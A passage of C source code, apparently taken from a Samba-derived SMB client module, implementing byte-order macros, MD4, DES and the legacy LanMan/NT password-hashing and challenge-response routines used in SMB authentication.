dependent on the length of int16 and int32\n being correct\n*/\n\n/* get single value from an SMB buffer */\n#define SVAL(buf, pos) (*(uint16 *)((char *)(buf) + (pos)))\n#define IVAL(buf, pos) (*(uint32 *)((char *)(buf) + (pos)))\n#define SVALS(buf, pos) (*(int16 *)((char *)(buf) + (pos)))\n#define IVALS(buf, pos) (*(int32 *)((char *)(buf) + (pos)))\n\n/* store single value in an SMB buffer */\n#define SSVAL(buf, pos, val) SVAL(buf, pos) = ((uint16)(val))\n#define SIVAL(buf, pos, val) IVAL(buf, pos) = ((uint32)(val))\n#define SSVALS(buf, pos, val) SVALS(buf, pos) = ((int16)(val))\n#define SIVALS(buf, pos, val) IVALS(buf, pos) = ((int32)(val))\n\n#endif /* CAREFUL_ALIGNMENT */\n\n/* macros for reading / writing arrays */\n\n#define SMBMACRO(macro, buf, pos, val, len, size) \\\n { \\\n int32_t l; \\\n for (l = 0; l < (len); l++) \\\n (val)[l] = macro((buf), (pos) + (size) * l); \\\n }\n\n#define SSMBMACRO(macro, buf, pos, val, len, size) \\\n { \\\n int32_t l; \\\n for (l = 0; l < (len); l++) \\\n macro((buf), (pos) + (size) * l, (val)[l]); \\\n }\n\n/* reads multiple data from an SMB buffer */\n#define PCVAL(buf, pos, val, len) SMBMACRO(CVAL, buf, pos, val, len, 1)\n#define PSVAL(buf, pos, val, len) SMBMACRO(SVAL, buf, pos, val, len, 2)\n#define PIVAL(buf, pos, val, len) SMBMACRO(IVAL, buf, pos, val, len, 4)\n#define PCVALS(buf, pos, val, len) SMBMACRO(CVALS, buf, pos, val, len, 1)\n#define PSVALS(buf, pos, val, len) SMBMACRO(SVALS, buf, pos, val, len, 2)\n#define PIVALS(buf, pos, val, len) SMBMACRO(IVALS, buf, pos, val, len, 4)\n\n/* stores multiple data in an SMB buffer */\n#define PSCVAL(buf, pos, val, len) SSMBMACRO(SCVAL, buf, pos, val, len, 1)\n#define PSSVAL(buf, pos, val, len) SSMBMACRO(SSVAL, buf, pos, val, len, 2)\n#define PSIVAL(buf, pos, val, len) SSMBMACRO(SIVAL, buf, pos, val, len, 4)\n#define PSCVALS(buf, pos, val, len) SSMBMACRO(SCVALS, buf, pos, val, len, 1)\n#define PSSVALS(buf, pos, val, len) SSMBMACRO(SSVALS, buf, pos, val, len, 2)\n#define PSIVALS(buf, pos, val, len) SSMBMACRO(SIVALS, buf, pos, val, len, 4)\n\n/* now the reverse routines - these are used in nmb packets (mostly) */\n#define SREV(x) ((((x) & 0xFF) << 8) | (((x) >> 8) & 0xFF))\n#define IREV(x) ((SREV(x) << 16) | (SREV((x) >> 16)))\n\n#define RSVAL(buf, pos) SREV(SVAL(buf, pos))\n#define RSVALS(buf, pos) SREV(SVALS(buf, pos))\n#define RIVAL(buf, pos) IREV(IVAL(buf, pos))\n#define RIVALS(buf, pos) IREV(IVALS(buf, pos))\n#define RSSVAL(buf, pos, val) SSVAL(buf, pos, SREV(val))\n#define RSSVALS(buf, pos, val) SSVALS(buf, pos, SREV(val))\n#define RSIVAL(buf, pos, val) SIVAL(buf, pos, IREV(val))\n#define RSIVALS(buf, pos, val) SIVALS(buf, pos, IREV(val))\n\n/* reads multiple data from an SMB buffer (big-endian) */\n#define RPSVAL(buf, pos, val, len) SMBMACRO(RSVAL, buf, pos, val, len, 2)\n#define RPIVAL(buf, pos, val, len) SMBMACRO(RIVAL, buf, pos, val, len, 4)\n#define RPSVALS(buf, pos, val, len) SMBMACRO(RSVALS, buf, pos, val, len, 2)\n#define RPIVALS(buf, pos, val, len) SMBMACRO(RIVALS, buf, pos, val, len, 4)\n\n/* stores multiple data in an SMB buffer (big-endian) */\n#define RPSSVAL(buf, pos, val, len) SSMBMACRO(RSSVAL, buf, pos, val, len, 2)\n#define RPSIVAL(buf, pos, val, len) SSMBMACRO(RSIVAL, buf, pos, val, len, 4)\n#define RPSSVALS(buf, pos, val, len) SSMBMACRO(RSSVALS, buf, pos, val, len, 2)\n#define RPSIVALS(buf, pos, val, len) SSMBMACRO(RSIVALS, buf, pos, val, len, 4)\n\n#define DBG_RW_PCVAL(charmode, string, depth, base, read, inbuf, outbuf, len) \\\n { \\\n RW_PCVAL(read, inbuf, outbuf, len) \\\n DEBUG(5, (\"%s%04x %s: \", tab_depth(depth), base, string)); \\\n if (charmode) \\\n print_asc(5, (unsigned char *)(outbuf), (len)); \\\n else { \\\n int32_t idx; \\\n for (idx = 0; idx < len; idx++) { \\\n DEBUG(5, (\"%02x \", (outbuf)[idx])); \\\n } \\\n } \\\n DEBUG(5, (\"\\n\")); \\\n }\n\n#define DBG_RW_PSVAL(charmode, string, depth, base, read, big_endian, inbuf, outbuf, len) \\\n { \\\n RW_PSVAL(read, big_endian, inbuf, outbuf, len) \\\n DEBUG(5, (\"%s%04x %s: \", tab_depth(depth), base, string)); \\\n if (charmode) \\\n print_asc(5, (unsigned char *)(outbuf), 2 * (len)); \\\n else { \\\n int32_t idx; \\\n for (idx = 0; idx < len; idx++) { \\\n DEBUG(5, (\"%04x \", (outbuf)[idx])); \\\n } \\\n } \\\n DEBUG(5, (\"\\n\")); \\\n }\n\n#define DBG_RW_PIVAL(charmode, string, depth, base, read, big_endian, inbuf, outbuf, len) \\\n { \\\n RW_PIVAL(read, big_endian, inbuf, outbuf, len) \\\n DEBUG(5, (\"%s%04x %s: \", tab_depth(depth), base, string)); \\\n if (charmode) \\\n print_asc(5, (unsigned char *)(outbuf), 4 * (len)); \\\n else { \\\n int32_t idx; \\\n for (idx = 0; idx < len; idx++) { \\\n DEBUG(5, (\"%08x \", (outbuf)[idx])); \\\n } \\\n } \\\n DEBUG(5, (\"\\n\")); \\\n }\n\n#define DBG_RW_CVAL(string, depth, base, read, inbuf, outbuf) \\\n { \\\n RW_CVAL(read, inbuf, outbuf, 0) \\\n DEBUG(5, (\"%s%04x %s: %02x\\n\", tab_depth(depth), base, string, outbuf)); \\\n }\n\n#define DBG_RW_SVAL(string, depth, base, read, big_endian, inbuf, outbuf) \\\n { \\\n RW_SVAL(read, big_endian, inbuf, outbuf, 0) \\\n DEBUG(5, (\"%s%04x %s: %04x\\n\", tab_depth(depth), base, string, outbuf)); \\\n }\n\n#define DBG_RW_IVAL(string, depth, base, read, big_endian, inbuf, outbuf) \\\n { \\\n RW_IVAL(read, big_endian, inbuf, outbuf, 0) \\\n DEBUG(5, (\"%s%04x %s: %08x\\n\", tab_depth(depth), base, string, outbuf)); \\\n }\n\n#endif /* _BYTEORDER_H */\n\n/* Samba MD4 implementation */\n\n/* NOTE: This code makes no attempt to be fast!\n\n It assumes that a int32_t is at least 32 bits long\n*/\n\nstatic uint32 A, B, C, D;\n\nstatic uint32 F(uint32 X, uint32 Y, uint32 Z) { return (X & Y) | ((~X) & Z); }\n\nstatic uint32 G(uint32 X, uint32 Y, uint32 Z) { return (X & Y) | (X & Z) | (Y & Z); }\n\nstatic uint32 H(uint32 X, uint32 Y, uint32 Z) { return X ^ Y ^ Z; }\n\nstatic uint32 lshift(uint32 x, int32_t s) {\n x &= 0xFFFFFFFF;\n return ((x << s) & 0xFFFFFFFF) | (x >> (32 - s));\n}\n\n#define ROUND1(a, b, c, d, k, s) a = lshift(a + F(b, c, d) + X[k], s)\n#define ROUND2(a, b, c, d, k, s) a = lshift(a + G(b, c, d) + X[k] + (uint32)0x5A827999, s)\n#define ROUND3(a, b, c, d, k, s) a = lshift(a + H(b, c, d) + X[k] + (uint32)0x6ED9EBA1, s)\n\n/* this applies md4 to 64 byte chunks */\nstatic void mdfour64(uint32 *M) {\n int32_t j;\n uint32 AA, BB, CC, DD;\n uint32 X[16];\n\n for (j = 0; j < 16; j++)\n X[j] = M[j];\n\n AA = A;\n BB = B;\n CC = C;\n DD = D;\n\n ROUND1(A, B, C, D, 0, 3);\n ROUND1(D, A, B, C, 1, 7);\n ROUND1(C, D, A, B, 2, 11);\n ROUND1(B, C, D, A, 3, 19);\n ROUND1(A, B, C, D, 4, 3);\n ROUND1(D, A, B, C, 5, 7);\n ROUND1(C, D, A, B, 6, 11);\n ROUND1(B, C, D, A, 7, 19);\n ROUND1(A, B, C, D, 8, 3);\n ROUND1(D, A, B, C, 9, 7);\n ROUND1(C, D, A, B, 10, 11);\n ROUND1(B, C, D, A, 11, 19);\n ROUND1(A, B, C, D, 12, 3);\n ROUND1(D, A, B, C, 13, 7);\n ROUND1(C, D, A, B, 14, 11);\n ROUND1(B, C, D, A, 15, 19);\n\n ROUND2(A, B, C, D, 0, 3);\n ROUND2(D, A, B, C, 4, 5);\n ROUND2(C, D, A, B, 8, 9);\n ROUND2(B, C, D, A, 12, 13);\n ROUND2(A, B, C, D, 1, 3);\n ROUND2(D, A, B, C, 5, 5);\n ROUND2(C, D, A, B, 9, 9);\n ROUND2(B, C, D, A, 13, 13);\n ROUND2(A, B, C, D, 2, 3);\n ROUND2(D, A, B, C, 6, 5);\n ROUND2(C, D, A, B, 10, 9);\n ROUND2(B, C, D, A, 14, 13);\n ROUND2(A, B, C, D, 3, 3);\n ROUND2(D, A, B, C, 7, 5);\n ROUND2(C, D, A, B, 11, 9);\n ROUND2(B, C, D, A, 15, 13);\n\n ROUND3(A, B, C, D, 0, 3);\n ROUND3(D, A, B, C, 8, 9);\n ROUND3(C, D, A, B, 4, 11);\n ROUND3(B, C, D, A, 12, 15);\n ROUND3(A, B, C, D, 2, 3);\n ROUND3(D, A, B, C, 10, 9);\n ROUND3(C, D, A, B, 6, 11);\n ROUND3(B, C, D, A, 14, 15);\n ROUND3(A, B, C, D, 1, 3);\n ROUND3(D, A, B, C, 9, 9);\n ROUND3(C, D, A, B, 5, 11);\n ROUND3(B, C, D, A, 13, 15);\n ROUND3(A, B, C, D, 3, 3);\n ROUND3(D, A, B, C, 11, 9);\n ROUND3(C, D, A, B, 7, 11);\n ROUND3(B, C, D, A, 15, 15);\n\n A += AA;\n B += BB;\n C += CC;\n D += DD;\n\n A &= 0xFFFFFFFF;\n B &= 0xFFFFFFFF;\n C &= 0xFFFFFFFF;\n D &= 0xFFFFFFFF;\n\n for (j = 0; j < 16; j++)\n X[j] = 0;\n}\n\nstatic void copy64(uint32 *M, unsigned char *in) {\n int32_t i;\n\n for (i = 0; i < 16; i++)\n M[i] = (in[i * 4 + 3] << 24) | (in[i * 4 + 2] << 16) | (in[i * 4 + 1] << 8) | (in[i * 4 + 0] << 0);\n}\n\nstatic void copy4(unsigned char *out, uint32 x) {\n out[0] = x & 0xFF;\n out[1] = (x >> 8) & 0xFF;\n out[2] = (x >> 16) & 0xFF;\n out[3] = (x >> 24) & 0xFF;\n}\n\n/* produce a md4 message digest from data of length n bytes */\nvoid mdfour(unsigned char *out, unsigned char *in, int32_t n) {\n unsigned char buf[128];\n uint32 M[16];\n uint32 b = n * 8;\n int32_t i;\n\n A = 0x67452301;\n B = 0xefcdab89;\n C = 0x98badcfe;\n D = 0x10325476;\n\n while (n > 64) {\n copy64(M, in);\n mdfour64(M);\n in += 64;\n n -= 64;\n }\n\n for (i = 0; i < 128; i++)\n buf[i] = 0;\n memcpy(buf, in, n);\n buf[n] = 0x80;\n\n if (n <= 55) {\n copy4(buf + 56, b);\n copy64(M, buf);\n mdfour64(M);\n } else {\n copy4(buf + 120, b);\n copy64(M, buf);\n mdfour64(M);\n copy64(M, buf + 64);\n mdfour64(M);\n }\n\n for (i = 0; i < 128; i++)\n buf[i] = 0;\n copy64(M, buf);\n\n copy4(out, A);\n copy4(out + 4, B);\n copy4(out + 8, C);\n copy4(out + 12, D);\n\n A = B = C = D = 0;\n}\n\n/* Samba DES implementation */\n#define uchar unsigned char\n#define int16 signed short\n\nstatic uchar perm1[56] = {57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4};\n\nstatic uchar perm2[48] = {14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32};\n\nstatic uchar perm3[64] = {58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7};\n\nstatic uchar perm4[48] = {32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1};\n\nstatic uchar perm5[32] = {16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25};\n\nstatic uchar perm6[64] = {40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25};\n\nstatic uchar sc[16] = {1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1};\n\nstatic uchar sbox[8][4][16] = {{{14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7}, {0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8}, {4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0}, {15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13}},\n\n {{15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10}, {3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5}, {0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15}, {13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9}},\n\n {{10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8}, {13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1}, {13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7}, {1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12}},\n\n {{7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15}, {13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9}, {10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4}, {3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14}},\n\n {{2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9}, {14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6}, {4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14}, {11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3}},\n\n {{12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11}, {10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8}, {9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6}, {4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13}},\n\n {{4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1}, {13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6}, {1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2}, {6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12}},\n\n {{13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7}, {1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2}, {7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8}, {2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11}}};\n\nstatic void permute(char *out, char *in, uchar *p, int32_t n) {\n int32_t i;\n\n for (i = 0; i < n; i++)\n out[i] = in[p[i] - 1];\n}\n\nstatic void l_shift(char *d, int32_t count, int32_t n) {\n char out[64];\n int32_t i;\n\n for (i = 0; i < n; i++)\n out[i] = d[(i + count) % n];\n for (i = 0; i < n; i++)\n d[i] = out[i];\n}\n\nstatic void concat(char *out, char *in1, char *in2, int32_t l1, int32_t l2) {\n while (l1--)\n *out++ = *in1++;\n while (l2--)\n *out++ = *in2++;\n}\n\nvoid xor\n (char *out, char *in1, char *in2, int32_t n) {\n int32_t i;\n\n for (i = 0; i < n; i++)\n out[i] = in1[i] ^ in2[i];\n }\n\n static void dohash(char *out, char *in, char *key, int32_t forw) {\n int32_t i, j, k;\n char pk1[56];\n char c[28];\n char d[28];\n char cd[56];\n char ki[16][48];\n char pd1[64];\n char l[32], r[32];\n char rl[64];\n\n permute(pk1, key, perm1, 56);\n\n for (i = 0; i < 28; i++)\n c[i] = pk1[i];\n for (i = 0; i < 28; i++)\n d[i] = pk1[i + 28];\n\n for (i = 0; i < 16; i++) {\n l_shift(c, sc[i], 28);\n l_shift(d, sc[i], 28);\n\n concat(cd, c, d, 28, 28);\n permute(ki[i], cd, perm2, 48);\n }\n\n permute(pd1, in, perm3, 64);\n\n for (j = 0; j < 32; j++) {\n l[j] = pd1[j];\n r[j] = pd1[j + 32];\n }\n\n for (i = 0; i < 16; i++) {\n char er[48];\n char erk[48];\n char b[8][6];\n char cb[32];\n char pcb[32];\n char r2[32];\n\n permute(er, r, perm4, 48);\n\n xor(erk, er, ki[forw ? i : 15 - i], 48);\n\n for (j = 0; j < 8; j++)\n for (k = 0; k < 6; k++)\n b[j][k] = erk[j * 6 + k];\n\n for (j = 0; j < 8; j++) {\n int32_t m, n;\n\n m = (b[j][0] << 1) | b[j][5];\n\n n = (b[j][1] << 3) | (b[j][2] << 2) | (b[j][3] << 1) | b[j][4];\n\n for (k = 0; k < 4; k++)\n b[j][k] = (sbox[j][m][n] & (1 << (3 - k))) ? 1 : 0;\n }\n\n for (j = 0; j < 8; j++)\n for (k = 0; k < 4; k++)\n cb[j * 4 + k] = b[j][k];\n permute(pcb, cb, perm5, 32);\n\n xor(r2, l, pcb, 32);\n\n for (j = 0; j < 32; j++)\n l[j] = r[j];\n\n for (j = 0; j < 32; j++)\n r[j] = r2[j];\n }\n\n concat(rl, r, l, 32, 32);\n\n permute(out, rl, perm6, 64);\n}\n\nstatic void str_to_key(unsigned char *str, unsigned char *key) {\n int32_t i;\n\n key[0] = str[0] >> 1;\n key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);\n key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);\n key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);\n key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);\n key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);\n key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);\n key[7] = str[6] & 0x7F;\n for (i = 0; i < 8; i++) {\n key[i] = (key[i] << 1);\n }\n}\n\nstatic void smbhash(unsigned char *out, unsigned char *in, unsigned char *key, int32_t forw) {\n int32_t i;\n char outb[64];\n char inb[64];\n char keyb[64];\n unsigned char key2[8];\n\n str_to_key(key, key2);\n\n for (i = 0; i < 64; i++) {\n inb[i] = (in[i / 8] & (1 << (7 - (i % 8)))) ? 1 : 0;\n keyb[i] = (key2[i / 8] & (1 << (7 - (i % 8)))) ? 1 : 0;\n outb[i] = 0;\n }\n\n dohash(outb, inb, keyb, forw);\n\n for (i = 0; i < 8; i++) {\n out[i] = 0;\n }\n\n for (i = 0; i < 64; i++) {\n if (outb[i])\n out[i / 8] |= (1 << (7 - (i % 8)));\n }\n}\n\nvoid E_P16(unsigned char *p14, unsigned char *p16) {\n unsigned char sp8[8] = {0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25};\n smbhash(p16, sp8, p14, 1);\n smbhash(p16 + 8, sp8, p14 + 7, 1);\n}\n\nvoid E_P24(unsigned char *p21, unsigned char *c8, unsigned char *p24) {\n smbhash(p24, c8, p21, 1);\n smbhash(p24 + 8, c8, p21 + 7, 1);\n smbhash(p24 + 16, c8, p21 + 14, 1);\n}\n\nvoid D_P16(unsigned char *p14, unsigned char *in, unsigned char *out) {\n smbhash(out, in, p14, 0);\n smbhash(out + 8, in + 8, p14 + 7, 0);\n}\n\nvoid E_old_pw_hash(unsigned char *p14, unsigned char *in, unsigned char *out) {\n smbhash(out, in, p14, 1);\n smbhash(out + 8, in + 8, p14 + 7, 1);\n}\n\nvoid cred_hash1(unsigned char *out, unsigned char *in, unsigned char *key) {\n unsigned char buf[8];\n\n smbhash(buf, in, key, 1);\n smbhash(out, buf, key + 9, 1);\n}\n\nvoid cred_hash2(unsigned char *out, unsigned char *in, unsigned char *key) {\n unsigned char buf[8];\n static unsigned char key2[8];\n\n smbhash(buf, in, key, 1);\n key2[0] = key[7];\n smbhash(out, buf, key2, 1);\n}\n\nvoid cred_hash3(unsigned char *out, unsigned char *in, unsigned char *key, int32_t forw) {\n static unsigned char key2[8];\n\n smbhash(out, in, key, forw);\n key2[0] = key[7];\n smbhash(out + 8, in + 8, key2, forw);\n}\n\nvoid SamOEMhash(unsigned char *data, unsigned char *key, int32_t val) {\n unsigned char s_box[256];\n unsigned char index_i = 0;\n unsigned char index_j = 0;\n unsigned char j = 0;\n int32_t ind;\n\n for (ind = 0; ind < 256; ind++) {\n s_box[ind] = (unsigned char)ind;\n }\n\n for (ind = 0; ind < 256; ind++) {\n unsigned char tc;\n\n j += (s_box[ind] + key[ind % 16]);\n\n tc = s_box[ind];\n s_box[ind] = s_box[j];\n s_box[j] = tc;\n }\n for (ind = 0; ind < (val ? 516 : 16); ind++) {\n unsigned char tc;\n unsigned char t;\n\n index_i++;\n index_j += s_box[index_i];\n\n tc = s_box[index_i];\n s_box[index_i] = s_box[index_j];\n s_box[index_j] = tc;\n\n t = s_box[index_i] + s_box[index_j];\n data[ind] = data[ind] ^ s_box[t];\n }\n}\n\n/* Samba encryption implementation*/\n\n/****************************************************************************\n Like strncpy but always null terminates. Make sure there is room!\n The variable n should always be one less than the available size.\n****************************************************************************/\n\nchar *StrnCpy(char *dest, const char *src, size_t n) {\n char *d = dest;\n\n if (!dest)\n return (NULL);\n if (!src) {\n *dest = 0;\n return (dest);\n }\n while (n-- && (*d++ = *src++))\n ;\n *d = 0;\n return (dest);\n}\n\nsize_t skip_multibyte_char(char c) { return 0; }\n\n/*******************************************************************\nsafe string copy into a known length string. maxlength does not\ninclude the terminating zero.\n********************************************************************/\n#define DEBUG(a, b) ;\nchar *safe_strcpy(char *dest, const char *src, size_t maxlength) {\n size_t len;\n\n if (!dest) {\n DEBUG(0, (\"Error: NULL dest in safe_strcpy\\n\"));\n return NULL;\n }\n\n if (!src) {\n *dest = 0;\n return dest;\n }\n\n len = strlen(src);\n\n if (len > maxlength) {\n DEBUG(0, (\"Error: string overflow by %d in safe_strcpy [%.50s]\\n\", (int32_t)(len - maxlength), src));\n len = maxlength;\n }\n\n memcpy(dest, src, len);\n dest[len] = 0;\n return dest;\n}\n\nvoid strupper(char *s) {\n while (*s) {\n {\n size_t skip = skip_multibyte_char(*s);\n\n if (skip != 0)\n s += skip;\n else {\n if (islower((int32_t)*s))\n *s = toupper((int32_t)*s);\n s++;\n }\n }\n }\n}\n\nextern void SMBOWFencrypt(uchar passwd[16], uchar *c8, uchar p24[24]);\n\n/*\n This implements the X/Open SMB password encryption\n It takes a password, a 8 byte \"crypt key\" and puts 24 bytes of\n encrypted password into p24\n */\n\nvoid SMBencrypt(uchar *passwd, uchar *c8, uchar *p24) {\n uchar p14[15], p21[21];\n\n memset(p21, '\\0', 21);\n memset(p14, '\\0', 14);\n StrnCpy((char *)p14, (char *)passwd, 14);\n\n strupper((char *)p14);\n E_P16(p14, p21);\n\n SMBOWFencrypt(p21, c8, p24);\n\n#ifdef DEBUG_PASSWORD\n DEBUG(100, (\"SMBencrypt: lm#, challenge, response\\n\"));\n dump_data(100, (char *)p21, 16);\n dump_data(100, (char *)c8, 8);\n dump_data(100, (char *)p24, 24);\n#endif\n}\n\n/* Routines for Windows NT MD4 Hash functions. */\nstatic int32_t _my_wcslen(int16 *str) {\n int32_t len = 0;\n\n while (*str++ != 0)\n len++;\n return len;\n}\n\n/*\n * Convert a string into an NT UNICODE string.\n * Note that regardless of processor type\n * this must be in intel (little-endian)\n * format.\n */\n\nstatic int32_t _my_mbstowcs(int16 *dst, uchar *src, int32_t len) {\n int32_t i;\n int16 val;\n\n for (i = 0; i < len; i++) {\n val = *src;\n SSVAL(dst, 0, val);\n dst++;\n src++;\n if (val == 0)\n break;\n }\n return i;\n}\n\n/*\n * Creates the MD4 Hash of the users password in NT UNICODE.\n */\n\nvoid E_md4hash(uchar *passwd, uchar *p16) {\n int32_t len;\n int16 wpwd[129];\n\n /* Password cannot be longer than 128 characters */\n len = strlen((char *)passwd);\n if (len > 128)\n len = 128;\n /* Password must be converted to NT unicode */\n _my_mbstowcs(wpwd, passwd, len);\n wpwd[len] = 0; /* Ensure string is null terminated */\n /* Calculate length in bytes */\n len = _my_wcslen(wpwd) * sizeof(int16);\n\n mdfour(p16, (unsigned char *)wpwd, len);\n}\n\n/* Does both the NT and LM owfs of a user's password */\nvoid nt_lm_owf_gen(char *pwd, uchar nt_p16[16], uchar p16[16]) {\n char passwd[130];\n\n memset(passwd, '\\0', 130);\n safe_strcpy(passwd, pwd, sizeof(passwd) - 1);\n\n /* Calculate the MD4 hash (NT compatible) of the password */\n memset(nt_p16, '\\0', 16);\n E_md4hash((uchar *)passwd, nt_p16);\n\n#ifdef DEBUG_PASSWORD\n DEBUG(100, (\"nt_lm_owf_gen: pwd, nt#\\n\"));\n dump_data(120, passwd, strlen(passwd));\n dump_data(100, (char *)nt_p16, 16);\n#endif\n\n /* Mangle the passwords into Lanman format */\n passwd[14] = '\\0';\n strupper(passwd);\n\n /* Calculate the SMB (lanman) hash functions of the password */\n\n memset(p16, '\\0', 16);\n E_P16((uchar *)passwd, (uchar *)p16);\n\n#ifdef DEBUG_PASSWORD\n DEBUG(100, (\"nt_lm_owf_gen: pwd, lm#\\n\"));\n dump_data(120, passwd, strlen(passwd));\n dump_data(100, (char *)p16, 16);\n#endif\n /* clear out local copy of user's password (just being paranoid). */\n memset(passwd, '\\0', sizeof(passwd));\n}\n\n/* Does the des encryption from the NT or LM MD4 hash. */\nvoid SMBOWFencrypt(uchar passwd[16], uchar *c8, uchar p24[24]) {\n uchar p21[21];\n\n memset(p21, '\\0', 21);\n\n memcpy(p21, passwd, 16);\n E_P24(p21, c8, p24);\n}\n\n/* Does the des encryption from the FIRST 8 BYTES of the NT or LM MD4 hash. */\nvoid NTLMSSPOWFencrypt(uchar passwd[8], uchar *ntlmchalresp, uchar p24[24]) {\n uchar p21[21];\n\n memset(p21, '\\0', 21);\n memcpy(p21, passwd, 8);\n memset(p21 + 8, 0xbd, 8);\n\n E_P24(p21, ntlmchalresp, p24);\n#ifdef DEBUG_PASSWORD\n DEBUG(100, (\"NTLMSSPOWFencrypt: p21, c8, p24\\n\"));\n dump_data(100, (char *)p21, 21);\n dump_data(100, (char *)ntlmchalresp, 8);\n dump_data(100, (char *)p24, 24);\n#endif\n}\n\n/* Does the NT MD4 hash then des encryption. */\n\nvoid SMBNTencrypt(uchar *passwd, uchar *c8, uchar *p24) {\n uchar p21[21];\n\n memset(p21, '\\0', 21);\n\n E_md4hash(passwd, p21);\n SMBOWFencrypt(p21, c8, p24);\n\n#ifdef DEBUG_PASSWORD\n DEBUG(100, (\"SMBNTencrypt: nt#, challenge, response\\n\"));\n dump_data(100, (char *)p21, 16);\n dump_data(100, (char *)c8, 8);\n dump_data(100, (char *)p24, 24);\n#endif\n}\n\n#if 0\n\nBOOL make_oem_passwd_hash(char data[516], const char *passwd, uchar old_pw_hash[16], BOOL unicode) {\n int32_t new_pw_len = strlen(passwd) * (unicode ? 2 : 1);\n\n if (new_pw_len > 512) {\n DEBUG(0, (\"make_oem_passwd_hash: new password is too long.\\n\"));\n return False;\n }\n\n /*\n * Now setup the data area.\n * We need to generate a random fill\n * for this area to make it harder to\n * decrypt. JRA.\n */\n generate_random_buffer((unsigned char *) data, 516, False);\n if (unicode) {\n struni2(&data[512 - new_pw_len], passwd);\n } else {\n fstrcpy(&data[512 - new_pw_len], passwd);\n }\n SIVAL(data, 512, new_pw_len);\n\n#ifdef DEBUG_PASSWORD\n DEBUG(100, (\"make_oem_passwd_hash\\n\"));\n dump_data(100, data, 516);\n#endif\n SamOEMhash((unsigned char *) data, (unsigned char *) old_pw_hash, 